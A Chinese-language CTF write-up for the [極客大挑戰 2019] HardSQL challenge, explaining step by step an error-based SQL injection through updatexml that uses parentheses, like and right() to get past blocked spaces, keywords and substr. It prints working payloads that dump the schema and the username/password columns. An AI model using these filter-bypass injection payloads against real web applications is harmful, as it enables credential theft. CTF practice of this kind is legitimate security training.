看了大佬的wp，沒用字典爆破，手動試出來的，屏蔽了常用的關鍵字，例如：order select union and 最搞的是，空格也有，這個空格后面讓我看了好久，該在哪里加括號。

先傳入1’ 1試試，發現提示報錯：

其實這里提示了報錯信息，就可以試一試報錯注入了，當然這是事后諸葛亮，還是常規的注入試試，發現行不通。

這里就已經給屏蔽詞才的差不多了，該進行報錯注入了，使用：1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

報出數據庫名：geek

然后這里是沒用空格的，但是爆表的時候，發現不對勁，要加上空格，但是空格被屏蔽了，于是就更換()來進行：1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

拿到表名：H4rDsq1

接著就是拿到列名：

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

注意這里等號也被屏蔽了，使用like進行替換。

拿到列名信息，接下來就是輸出相關信息：

1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

這里使用~來做一個填充，區別user列和pass列，然后得到信息：

拿到信息了，但是沒拿完，拿了一半的flag，這是為什么？因為報錯注入，最多顯示32個字符，所以還要對后面的字符進行輸出，但是這里又碰到substr關鍵字被屏蔽，也是。。。沒辦法，又看看大佬的wp，原來是用的right()突破字符限制，就是從字符串的最右邊起，開始選字符。

例如：SELECT RIGHT('Hello, World', 5);

這將返回World。

所以接著的語句就是：

這里還有最后一點需要注意，就是在拼接的時候，不能想當然的把兩個字符串拼接。要除去相同的部分：

'~flag~flag{93c21fdf-7e2b-4d48-ae'

'~b-4d48-ae6c-8abab092b920}~'

拼接后就是：flag{93c21fdf-7e2b-4d48-ae6c-8abab092b920}

這里的flag是動態的，別嘗試用這個。

還可以用：^來更換or,然后不用updatexml()，而是使用：extractvalue()原理都是一樣的。

大佬的wp：非常經典的一道SQL報錯注入題目[極客大挑戰 2019]HardSQL 1（兩種解法！）-CSDN博客